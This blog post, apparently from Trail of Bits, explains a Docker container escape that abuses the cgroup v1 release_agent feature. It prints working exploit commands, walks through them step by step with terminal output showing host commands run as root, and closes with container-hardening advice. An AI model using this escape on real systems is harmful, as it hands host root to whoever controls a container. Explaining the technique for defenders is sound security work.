Understanding Docker container escapes

Trail of Bits recently completed a security assessment of Kubernetes, including its interaction with Docker. Felix Wilhelm’s recent tweet of a Proof of Concept (PoC) “container escape” sparked our interest, since we performed similar research and were curious how this PoC could impact Kubernetes.

Felix’s tweet shows an exploit that launches a process on the host from within a Docker container run with the --privileged flag. The PoC achieves this by abusing the Linux cgroup v1 “notification on release” feature.

Here’s a version of the PoC that launches ps on the host:

# spawn a new container to exploit via:
# docker run --rm -it --privileged ubuntu bash

d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;printf '#!/bin/sh\nps >'"$t/o" >/c;
chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o

The --privileged flag introduces significant security concerns, and the exploit relies on launching a docker container with it enabled. When using this flag, containers have full access to all devices and lack restrictions from seccomp, AppArmor, and Linux capabilities.

Don’t run containers with --privileged. Docker includes granular settings that independently control the privileges of containers. In our experience, these critical security settings are often forgotten. It is necessary to understand how these options work to secure your containers.

In the sections that follow, we’ll walk through exactly how this “container escape” works, the insecure settings that it relies upon, and what developers should do instead.

Requirements to use this technique

In fact, --privileged provides far more permissions than needed to escape a docker container via this method. In reality, the “only” requirements are:

  1. We must be running as root inside the container
  2. The container must be run with the SYS_ADMIN Linux capability
  3. The container must lack an AppArmor profile, or otherwise allow the mount syscall
  4. The cgroup v1 virtual filesystem must be mounted read-write inside the container

The SYS_ADMIN capability allows a container to perform the mount syscall (see man 7 capabilities). Docker starts containers with a restricted set of capabilities by default and does not enable the SYS_ADMIN capability due to the security risks of doing so.

Further, Docker starts containers with the docker-default AppArmor policy by default, which prevents the use of the mount syscall even when the container is run with SYS_ADMIN.

A container would be vulnerable to this technique if run with the flags: --security-opt apparmor=unconfined --cap-add=SYS_ADMIN

Using cgroups to deliver the exploit

Linux cgroups are one of the mechanisms by which Docker isolates containers. The PoC abuses the functionality of the notify_on_release feature in cgroups v1 to run the exploit as a fully privileged root user.

When the last task in a cgroup leaves (by exiting or attaching to another cgroup), a command supplied in the release_agent file is executed. The intended use for this is to help prune abandoned cgroups. This command, when invoked, is run as a fully privileged root on the host.

1.4 What does notify_on_release do ?
————————————
If the notify_on_release flag is enabled (1) in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, then the kernel runs the command specified by the contents of the “release_agent” file in that hierarchy’s root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup. This enables automatic removal of abandoned cgroups. The default value of notify_on_release in the root cgroup at system boot is disabled (0). The default value of other cgroups at creation is the current value of their parents’ notify_on_release settings. The default value of a cgroup hierarchy’s release_agent path is empty.

Linux Kernel documentation on cgroups v1

Refining the proof of concept

There is a simpler way to write this exploit so it works without the --privileged flag. In this scenario, we won’t have access to a read-write cgroup mount provided by --privileged. Adapting to this scenario is easy: we’ll just mount the cgroup as read-write ourselves. This adds one extra line to the exploit but requires fewer privileges.

The exploit below will execute a ps aux command on the host and save its output to the /output file in the container. It uses the same release_agent feature as the original PoC to execute on the host.

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Breaking down the proof of concept

Now that we understand the requirements to use this technique and have refined the proof of concept exploit, let’s walk through it line-by-line to demonstrate how it works.

To trigger this exploit we need a cgroup where we can create a release_agent file and trigger release_agent invocation by killing all processes in the cgroup. The easiest way to accomplish that is to mount a cgroup controller and create a child cgroup.

To do that, we create a /tmp/cgrp directory, mount the RDMA cgroup controller and create a child cgroup (named “x” for the purposes of this example). While every cgroup controller has not been tested, this technique should work with the majority of cgroup controllers.

If you’re following along and get “mount: /tmp/cgrp: special device cgroup does not exist”, it’s because your setup doesn’t have the RDMA cgroup controller. Change rdma to memory to fix it. We’re using RDMA because the original PoC was only designed to work with it.

Note that cgroup controllers are global resources that can be mounted multiple times with different permissions and the changes rendered in one mount will apply to another.

We can see the “x” child cgroup creation and its directory listing below.

root@b11cf9eab4fd:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
root@b11cf9eab4fd:/# ls /tmp/cgrp/
cgroup.clone_children  cgroup.procs  cgroup.sane_behavior  notify_on_release  release_agent  tasks  x
root@b11cf9eab4fd:/# ls /tmp/cgrp/x
cgroup.clone_children  cgroup.procs  notify_on_release  rdma.current  rdma.max  tasks

Next, we enable cgroup notifications on release of the “x” cgroup by writing a 1 to its notify_on_release file. We also set the RDMA cgroup release agent to execute a /cmd script — which we will later create in the container — by writing the /cmd script path on the host to the release_agent file. To do it, we’ll grab the container’s path on the host from the /etc/mtab file.

The files we add or modify in the container are present on the host, and it is possible to modify them from both worlds: the path in the container and their path on the host.

Those operations can be seen below:

root@b11cf9eab4fd:/# echo 1 > /tmp/cgrp/x/notify_on_release
root@b11cf9eab4fd:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@b11cf9eab4fd:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent

Note the path to the /cmd script, which we are going to create on the host:

root@b11cf9eab4fd:/# cat /tmp/cgrp/release_agent
/var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/cmd

Now, we create the /cmd script such that it will execute the ps aux command and save its output into /output on the container by specifying the full path of the output file on the host. At the end, we also print the /cmd script to see its contents:

root@b11cf9eab4fd:/# echo '#!/bin/sh' > /cmd
root@b11cf9eab4fd:/# echo "ps aux > $host_path/output" >> /cmd
root@b11cf9eab4fd:/# chmod a+x /cmd
root@b11cf9eab4fd:/# cat /cmd
#!/bin/sh
ps aux > /var/lib/docker/overlay2/7f4175c90af7c54c878ffc6726dcb125c416198a2955c70e186bf6a127c5622f/diff/output

Finally, we can execute the attack by spawning a process that immediately ends inside the “x” child cgroup. By creating a /bin/sh process and writing its PID to the cgroup.procs file in “x” child cgroup directory, the script on the host will execute after /bin/sh exits. The output of ps aux performed on the host is then saved to the /output file inside the container:

root@b11cf9eab4fd:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
root@b11cf9eab4fd:/# head /output
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.1  1.0  17564 10288 ?        Ss   13:57   0:01 /sbin/init
root         2  0.0  0.0      0     0 ?        S    13:57   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        I<   13:57   0:00 [rcu_gp]
root         4  0.0  0.0      0     0 ?        I<   13:57   0:00 [rcu_par_gp]
root         6  0.0  0.0      0     0 ?        I<   13:57   0:00 [kworker/0:0H-kblockd]
root         8  0.0  0.0      0     0 ?        I<   13:57   0:00 [mm_percpu_wq]
root         9  0.0  0.0      0     0 ?        S    13:57   0:00 [ksoftirqd/0]
root        10  0.0  0.0      0     0 ?        I    13:57   0:00 [rcu_sched]
root        11  0.0  0.0      0     0 ?        S    13:57   0:00 [migration/0]

Use containers securely

Docker restricts and limits containers by default. Loosening these restrictions may create security issues, even without the full power of the --privileged flag. It is important to acknowledge the impact of each additional permission, and limit permissions overall to the minimum necessary.

To help keep containers secure:

  • Do not use the --privileged flag or mount a Docker socket inside the container. The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the --privileged flag.
  • Do not run as root inside the container. Use a different user or user namespaces. The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups.
  • Drop all capabilities (--cap-drop=all) and enable only those that are required (--cap-add=...). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack.
  • Use the “no-new-privileges” security option to prevent processes from gaining more privileges, for example through suid binaries.
  • Limit resources available to the container. Resource limits can protect the machine from denial of service attacks.
  • Adjust seccomp, AppArmor (or SELinux) profiles to restrict the actions and syscalls available for the container to the minimum required.
  • Use official docker images or build your own based on them. Don’t inherit or use backdoored images.
  • Regularly rebuild your images to apply security patches. This goes without saying.

If you would like a second look at your organization’s critical infrastructure, Trail of Bits would love to help. Reach out and say hello!

One thought on “Understanding Docker container escapes

  1. Nice walk-through and kudos for explaining the exact required components rather than using –privileged. A small note I want to suggest is that your code will only work in an environment with a single container (due to multiple results at the path search)

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s